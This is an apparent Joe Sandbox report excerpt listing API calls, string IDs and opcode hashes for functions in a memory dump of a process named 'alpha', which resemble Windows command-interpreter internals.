                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                        • Instruction ID: b2b052761bee8f90e345300f186ced72426a92be806872f36e1bcebb518d5385
                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                        • Instruction Fuzzy Hash: A8417072A1CA4186E7109F12A844739FAA6FB99FA4F888234DF5907794DF3CD2148B10
                                        APIs
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496A73
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496A91
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496AB0
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496AE3
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496B01
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$iswdigit
                                        • String ID: +-~!$<>+-*/%()|^&=,
                                        • API String ID: 2770779731-632268628
                                        • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                        • Instruction ID: a9853a7cba4e009d46bb94343a1f46c920237e00af50becf4b256b6b1526955a
                                        • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                        • Instruction Fuzzy Hash: B8316C3270CE6685EA50AF52E450678B6A5FB59F94B858035DF6E03354FF3CE600C720
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491673
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49168D
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491757
                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49176E
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491788
                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49179C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Alloc$Size
                                        • String ID:
                                        • API String ID: 3586862581-0
                                        • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                        • Instruction ID: 3bb158a453407c2897abf5b9603a865e848544f43cfe243c414fe228f80c7f2d
                                        • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                        • Instruction Fuzzy Hash: DA916F61B0DA4281EA14AF16A444678F7A6FB54BA1F998136DF6D037A0FF3CE641C320
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                        • String ID:
                                        • API String ID: 1313749407-0
                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                        • Instruction ID: 1bcc4565639b50edae71209ecfe99b6331be8da80bf3fd050cb50811b1912ebd
                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                        • Instruction Fuzzy Hash: E751A222B0C68292EE10BF169904579E69ABF55BB0F884170DF3E073D5FF3CEA408620
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                        • String ID: KEYS$LIST$OFF
                                        • API String ID: 411561164-4129271751
                                        • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                        • Instruction ID: 28cd1575d557dd362f7db2d9c961e1dcfadb03c1ce529aa67a9ce272c1ce7969
                                        • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                        • Instruction Fuzzy Hash: 35215E20B0CA02A1FA54BF65E855175F6A1EB947B0FC49231DF3E462E5FE3CDA448720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 3849470556-1994581435
                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                        • Instruction ID: 72e36a48bb84eaddc38185d121e35f763a2659c3a4269981e8cbe25e57be3e05
                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                        • Instruction Fuzzy Hash: 58517C31B0C64285EB64AF56E848579B7A0BB54BA4F848435DF6D87390FF7EEA40C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$CurrentDirectorytowupper
                                        • String ID:
                                        • API String ID: 1403193329-0
                                        • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                        • Instruction ID: 0fcfa3307ff4dbbda2110518a452ff0ce924fee45b8b523715cccf9ba5964ff0
                                        • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                        • Instruction Fuzzy Hash: B551C126B0D68185EB24EF22D844AB9B7A6EF49778F858035CF2D07694FF3CD6448720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$_setjmp
                                        • String ID:
                                        • API String ID: 3883041866-0
                                        • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                        • Instruction ID: 65374a5faea3d53b147426f37c97d3e50fa5b4fa4847c500818b607f916edf65
                                        • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                        • Instruction Fuzzy Hash: 8D514F3270CB868AEB619F21D8803EAB7A4EB45798F804135DB5D87A49EF3CD744CB10
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorModememset$FullNamePath_wcsicmp
                                        • String ID:
                                        • API String ID: 2123716050-0
                                        • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                        • Instruction ID: 9a7bec5cd8569f6ded2cb1598561de662fa46c3a069cd096dc2a2ca4466bc0e2
                                        • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                        • Instruction Fuzzy Hash: C141A032709AC28AEB71AF21D8843E9B795EB4979CF844134DF5D4AA98EF3CD3448710
                                        APIs
                                          • Part of subcall function 00007FF7CD4933A8: iswspace.MSVCRT(?,?,00000000,00007FF7CD4AD6EE,?,?,?,00007FF7CD4A0632), ref: 00007FF7CD4933C0
                                        • iswspace.MSVCRT(?,?,?,00007FF7CD4932A4), ref: 00007FF7CD49331C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswspace
                                        • String ID: off
                                        • API String ID: 2389812497-733764931
                                        • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                        • Instruction ID: d305a1a1a0268bea4ddc89bdcc00ed2e0d549eb27ecbcc99dc7c8d3852e8bdfd
                                        • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                        • Instruction Fuzzy Hash: 9A219421B0C64291FA70AF579458679F697EF46BA0FCC8034DF6E47690FE2CE6408321
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                        • String ID: %s=%s$DPATH$PATH
                                        • API String ID: 3731854180-3148396303
                                        • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                        • Instruction ID: 0c634b2a07d0842a9beb0e12c8ec306ea5b35549c1795a4e1465f4671017d59c
                                        • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                        • Instruction Fuzzy Hash: 05218025B0DA5290EE54AF95E440679E3A5AF84BA4FC88135CF2E47395FF3CD6408760
                                        APIs
                                          • Part of subcall function 00007FF7CD493C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD493D0C
                                          • Part of subcall function 00007FF7CD493C24: towupper.MSVCRT ref: 00007FF7CD493D2F
                                          • Part of subcall function 00007FF7CD493C24: iswalpha.MSVCRT ref: 00007FF7CD493D4F
                                          • Part of subcall function 00007FF7CD493C24: towupper.MSVCRT ref: 00007FF7CD493D75
                                          • Part of subcall function 00007FF7CD493C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD493DBF
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD486ABF
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD486AD3
                                          • Part of subcall function 00007FF7CD486B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7CD486AE8,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B8B
                                          • Part of subcall function 00007FF7CD486B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7CD486AE8,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B97
                                          • Part of subcall function 00007FF7CD486B84: RtlFreeHeap.NTDLL ref: 00007FF7CD486BAF
                                          • Part of subcall function 00007FF7CD486B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD486AF1,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B39
                                          • Part of subcall function 00007FF7CD486B30: RtlFreeHeap.NTDLL ref: 00007FF7CD486B4D
                                          • Part of subcall function 00007FF7CD486B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD486AF1,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B59
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD486B03
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD486B17
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                        • String ID:
                                        • API String ID: 3512109576-0
                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                        • Instruction ID: 7fe8b07715b12a3b8351a958f3a9b0fb77b3244cf8d78721bf89ea32230b32a1
                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                        • Instruction Fuzzy Hash: 94216061B0DA8286EB44AF6698142B8BBA1EB59B54F948035CF2E47355EE2C9546C320
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B6D0
                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B6E7
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B701
                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B715
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocSize
                                        • String ID:
                                        • API String ID: 2549470565-0
                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                        • Instruction ID: a3f1c9c1b5cbb9d0eebe271c596b3d5fa62c19b627716f346d4fd7b9c8465a63
                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                        • Instruction Fuzzy Hash: 4221EE25B0DB4296EE14AF55E444078FAA1FB89B90BC89431DF2E43754EF3CE645C720
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7CD4A5433,?,?,?,00007FF7CD4A69B8,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A56C5
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A56D9
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7CD4A5433,?,?,?,00007FF7CD4A69B8,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A56FD
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A5711
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                        • Instruction ID: af4b323460223be10d2c26af31a9af36ccaed972897ebd0604b1af1e724792bf
                                        • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                        • Instruction Fuzzy Hash: B9113672A08B81D6EB009F56E4040ACBBB1FB9DF94B888125DF5E03718EF38E556C750
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                        • String ID:
                                        • API String ID: 140117192-0
                                        • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                        • Instruction ID: 0e03c8e30732d54e189a89c105357eb63b0b6d5c57af0e31462d7a81c71f7175
                                        • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                        • Instruction Fuzzy Hash: D4210435A0CF81A1E648AF45E8803A9B3A4FB98764F9000B5DF9E02764EF3DE244C720
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AD6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AEF
                                          • Part of subcall function 00007FF7CD494A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                          • Part of subcall function 00007FF7CD494A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                          • Part of subcall function 00007FF7CD494A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                          • Part of subcall function 00007FF7CD494A14: memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                          • Part of subcall function 00007FF7CD494A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD49EE64
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD49EE78
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                        • String ID:
                                        • API String ID: 2759988882-0
                                        • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                        • Instruction ID: 6d20212b7ae7292d5a836c2b3755dee44da18ecd182ecb8080b9a28457865297
                                        • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                        • Instruction Fuzzy Hash: ECF0EC61B1DA4296EF14AFA69418578F9D2EF8EB61B88D434CE1E42350FE3CA6458720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleMode_get_osfhandle
                                        • String ID:
                                        • API String ID: 1606018815-0
                                        • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                        • Instruction ID: c5326dbcd0ed2341e9425964785f693da3a06a48f324f9f361c8b445caa782d6
                                        • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                        • Instruction Fuzzy Hash: FBF01232628A41DBD7446F51E444179FA61FB9AB12FC49234DF1F02394EF3CD1048B50
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleTitle
                                        • String ID: -
                                        • API String ID: 3358957663-3695764949
                                        • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                        • Instruction ID: c748e467075e0743f98b9e45d38919dffa59fb2bfa209dcdc71d09afd0d8500f
                                        • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                        • Instruction Fuzzy Hash: E7316F21B0CA4286EA14BF12A804478EAA5BB89BF0F944135DF2E577D5FF3CE651C324
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmpswscanf
                                        • String ID: :EOF
                                        • API String ID: 1534968528-551370653
